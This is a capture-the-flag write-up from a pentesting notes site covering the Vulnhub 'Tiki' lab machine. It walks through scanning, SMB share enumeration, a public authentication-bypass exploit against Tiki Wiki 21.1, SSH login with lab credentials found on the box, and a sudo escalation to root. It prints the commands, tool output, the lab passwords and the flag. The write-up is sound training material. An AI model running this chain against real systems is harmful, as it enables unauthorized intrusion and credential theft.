Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Locate the machine
  • scanning
  • Enumerate smb services
  • Enumerate HTTP
  • Vulnerability search
  1. Boxes/ Machines
  2. Vulnhub

Tiki

PreviousVulnhubNextHTB

Last updated 1 year ago

Locate the machine

netdiscover -i eth1
 Currently scanning: 192.168.12.0/16   |   Screen View: Unique Hosts                                         
                                                                                                             
 9 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 540                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.130   00:0c:29:d9:b6:38      8     480  VMware, Inc.                                              
 192.168.2.254   00:50:56:ee:e3:ed      1      60  VMware, Inc.   

scanning

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -T4 192.168.2.130 -oA scan.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-11 04:18 EDT
Nmap scan report for 192.168.2.130
Host is up (0.00048s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a3d84a89a9256d07c53d762806edd1c0 (RSA)
|   256 e7b289055457dc02f48c3a7c558b51aa (ECDSA)
|_  256 fd77072b4a163a016be0000c0a36d82f (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/tiki/
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:0C:29:D9:B6:38 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 4h59m59s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2023-07-11T13:19:17
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.28 seconds

Enumerate smb services

enum4linux -a 192.168.2.130

We got the username "silky"

We also got some shares

we can try connecting to share with smbclient

└─$ smbclient -L 192.168.2.130
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Notes           Disk      My Notes
        IPC$            IPC       IPC Service (ubuntu server (Samba, Ubuntu))
smbclient \\\\192.168.2.130\\Notes
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 29 09:52:09 2020
  ..                                  D        0  Thu Jul 30 15:32:11 2020
  Mail.txt                            N      244  Wed Jul 29 09:52:05 2020

                19992176 blocks of size 1024. 10048128 blocks available
smb: \> get Mail.txt
getting file \Mail.txt of size 244 as Mail.txt (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)

So, download the Mail.txt file. Now check its contents and we have the password "51lky571k"

┌──(kali㉿kali)-[~]
└─$ cat Mail.txt 
Hi Silky
because of a current Breach we had to change all Passwords,
please note that it was a 0day, we don't know how he made it.

Your new CMS-password is now 51lky571k1, 
please investigate how he made it into our Admin Panel.

Cheers Boss.

Enumerate HTTP

check robots.txt file

we get tiki cms on main page. visiting tiki CMS robots.txt we do get a few more directories

Running gobuster we get a README file

obuster dir --url http://192.168.2.130/tiki/ -w=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.130/tiki/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/11 04:37:27 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 317] [--> http://192.168.2.130/tiki/img/]
/templates            (Status: 301) [Size: 323] [--> http://192.168.2.130/tiki/templates/]
/themes               (Status: 301) [Size: 320] [--> http://192.168.2.130/tiki/themes/]
/modules              (Status: 301) [Size: 321] [--> http://192.168.2.130/tiki/modules/]
/doc                  (Status: 301) [Size: 317] [--> http://192.168.2.130/tiki/doc/]
/admin                (Status: 301) [Size: 319] [--> http://192.168.2.130/tiki/admin/]
/lists                (Status: 301) [Size: 319] [--> http://192.168.2.130/tiki/lists/]
/storage              (Status: 301) [Size: 321] [--> http://192.168.2.130/tiki/storage/]
/lib                  (Status: 301) [Size: 317] [--> http://192.168.2.130/tiki/lib/]
/db                   (Status: 301) [Size: 316] [--> http://192.168.2.130/tiki/db/]
/README               (Status: 200) [Size: 1192]
/lang                 (Status: 301) [Size: 318] [--> http://192.168.2.130/tiki/lang/]
/temp                 (Status: 301) [Size: 318] [--> http://192.168.2.130/tiki/temp/]
/vendor               (Status: 301) [Size: 320] [--> http://192.168.2.130/tiki/vendor/]
/INSTALL              (Status: 200) [Size: 3095]
/installer            (Status: 301) [Size: 323] [--> http://192.168.2.130/tiki/installer/]
/dump                 (Status: 301) [Size: 318] [--> http://192.168.2.130/tiki/dump/]
Progress: 144805 / 220561 (65.65%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/07/11 04:39:47 Finished
===============================================================

same results with FFUF

┌──(kali㉿kali)-[~]
└─$ ffuf -u http://192.168.2.130/tiki/FUZZ -w /usr/share/wordlists/dirb/common.txt                    

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.2.130/tiki/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

                        [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 113ms]
admin                   [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 9ms]
.htpasswd               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 939ms]
db                      [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 2ms]
.htaccess               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 988ms]
.hta                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1023ms]
doc                     [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 8ms]
dump                    [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 12ms]
img                     [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 4ms]
installer               [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 3ms]
index.php               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 224ms]
lang                    [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 2ms]
lib                     [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
lists                   [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 6ms]
modules                 [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
README                  [Status: 200, Size: 1192, Words: 158, Lines: 34, Duration: 1ms]
robots.txt              [Status: 200, Size: 2937, Words: 335, Lines: 87, Duration: 7ms]
storage                 [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 1ms]
temp                    [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 3ms]
templates               [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 3ms]
themes                  [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 25ms]
vendor                  [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 18ms]
xmlrpc.php              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 220ms]
:: Progress: [4614/4614] :: Job [1/1] :: 2448 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

Opening README, we got cms version number tiki 21.1

Vulnerability search

searching vulnerability on searchsploit, we got the hit

─$ searchsploit tiki           
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Tiki Wiki 15.1 - File Upload                                                                       | php/webapps/40053.py
Tiki Wiki 15.1 - File Upload (Metasploit)                                                          | php/webapps/40091.rb
Tiki Wiki CMS 15.0 - Arbitrary File Download                                                       | php/webapps/40080.txt
Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution                         | php/webapps/39965.txt
Tiki Wiki CMS Groupware - 'url' Open Redirection                                                   | php/webapps/36848.txt
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass                                               | php/webapps/48927.py

download it

searchsploit -m php/webapps/48927.py

  Exploit: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
      URL: https://www.exploit-db.com/exploits/48927
     Path: /usr/share/exploitdb/exploits/php/webapps/48927.py
    Codes: N/A
 Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/48927.py

Now execute the script

                                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ python3 48927.py 192.168.2.130
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password

Let's use burp and try to log in.

we got logged in.

Visiting the wiki/credentials page, we get the password silky:Agy8Y7SPJNXQzqA

As ssh was enabled, login with ssh

                                                                                                    
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


1 Aktualisierung kann sofort installiert werden.
0 dieser Aktualisierung sind Sicherheitsaktualisierungen.
Um zu sehen, wie diese zusätzlichen Updates ausgeführt werden: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Jul 31 09:50:24 2020 from 192.168.56.1



silky@ubuntu:~$

Check permissions and we can run every command so run sudo -i and we have flag in the root directory.

silky@ubuntu:~/Note$ sudo -i
root@ubuntu:~# ls
flag.txt
root@ubuntu:~# cat flag.txt

 ██████╗ ██████╗ ███╗   ██╗ ██████╗ ██████╗  █████╗ ████████╗██╗   ██╗██╗      █████╗ ████████╗██╗ ██████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔═══██╗████╗  ██║██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝██║   ██║██║     ██╔══██╗╚══██╔══╝██║██╔═══██╗████╗  ██║██╔════╝██║
██║     ██║   ██║██╔██╗ ██║██║  ███╗██████╔╝███████║   ██║   ██║   ██║██║     ███████║   ██║   ██║██║   ██║██╔██╗ ██║███████╗██║
██║     ██║   ██║██║╚██╗██║██║   ██║██╔══██╗██╔══██║   ██║   ██║   ██║██║     ██╔══██║   ██║   ██║██║   ██║██║╚██╗██║╚════██║╚═╝
╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║  ██║██║  ██║   ██║   ╚██████╔╝███████╗██║  ██║   ██║   ██║╚██████╔╝██║ ╚████║███████║██╗
 ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝
                                                                                                                                
You did it ^^
I hope you had fun.
Share your flag with me on Twitter: S1lky_1337


flag:88d8120f434c3b4221937a8cd0668588

Now we got the flag

flag:88d8120f434c3b4221937a8cd0668588
Tiki: 1
Logo